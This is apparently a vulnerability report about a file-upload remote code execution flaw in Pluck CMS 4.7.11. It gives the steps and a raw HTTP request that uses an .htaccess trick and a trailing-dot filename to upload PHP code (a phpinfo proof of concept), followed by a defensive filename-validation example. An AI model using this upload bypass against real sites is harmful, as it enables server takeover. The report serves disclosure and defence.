Pluck-4.7.11 admin background exists a remote command execution vulnerability when uploading files #91

Closed
@wooyin

The Pluck-4.7.11 admin background has a remote command execution vulnerability when uploading files.

Proof
step1: log in -> pages -> manage files
upload a .htaccess file to turn files/.htaccess into .htaccess.txt

step2: throw .htaccess.txt into the trash

step3: upload shell code

```
POST /pluck4711/admin.php?action=files HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------18467633426500
Content-Length: 339
Connection: close
Referer: http://127.0.0.1/pluck4711/admin.php?action=files
Cookie: PHPSESSID=50oi7cqaj4hrmj6pqiufa57lij
Upgrade-Insecure-Requests: 1

-----------------------------18467633426500
Content-Disposition: form-data; name="filefile"; filename="pass07.php......"
Content-Type: application/octet-stream

<?php echo phpinfo();?>
-----------------------------18467633426500
Content-Disposition: form-data; name="submit"

Upload
-----------------------------18467633426500--
```


step4: view http://127.0.0.1/pluck4711/files/pass07.php
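
As an added example (not part of the original report and not Pluck's own code): a server-side filename check in PHP that rejects the names used in steps 1 and 3. It assumes the `pass07.php......` upload succeeds because the filesystem drops trailing dots, as Windows does; `safe_upload_name()` and the extension allow-list are hypothetical.

```php
<?php
// Added example, not Pluck's own code. safe_upload_name() and the
// allow-list below are hypothetical names chosen for this illustration.
const ALLOWED_EXTENSIONS = ['jpg', 'jpeg', 'png', 'gif', 'pdf', 'txt'];

/** Return the name to store an upload under, or null to reject it. */
function safe_upload_name(string $clientName): ?string
{
    // Keep only the last path component and drop control bytes (incl. NUL).
    $name = basename(str_replace('\\', '/', $clientName));
    $name = (string) preg_replace('/[\x00-\x1f\x7f]/', '', $name);

    // Windows drops trailing dots and spaces when it creates a file, so
    // validate the name the filesystem will actually use.
    $name = rtrim($name, '. ');

    // Dotfiles (.htaccess, .htaccess.txt, ...) are never accepted.
    if ($name === '' || $name[0] === '.') {
        return null;
    }

    // Exactly one dot: "stem.ext". This also rejects "x.php.jpg".
    $parts = explode('.', $name);
    if (count($parts) !== 2) {
        return null;
    }
    [$stem, $ext] = $parts;
    $ext = strtolower($ext);

    if (!preg_match('/^[A-Za-z0-9][A-Za-z0-9_-]*$/', $stem)
        || !in_array($ext, ALLOWED_EXTENSIONS, true)) {
        return null;
    }
    return $stem . '.' . $ext;
}

// Constructed sample names; the first two are the ones used in the report.
$samples = ['pass07.php......', '.htaccess', 'x.php.jpg', 'photo.JPG ', 'report.pdf'];
foreach ($samples as $sample) {
    $stored = safe_upload_name($sample);
    printf("%-20s => %s\n", "'" . $sample . "'", $stored ?? 'REJECTED');
}
```

Storing uploads under a server-generated name outside the web root avoids relying on filename checks alone.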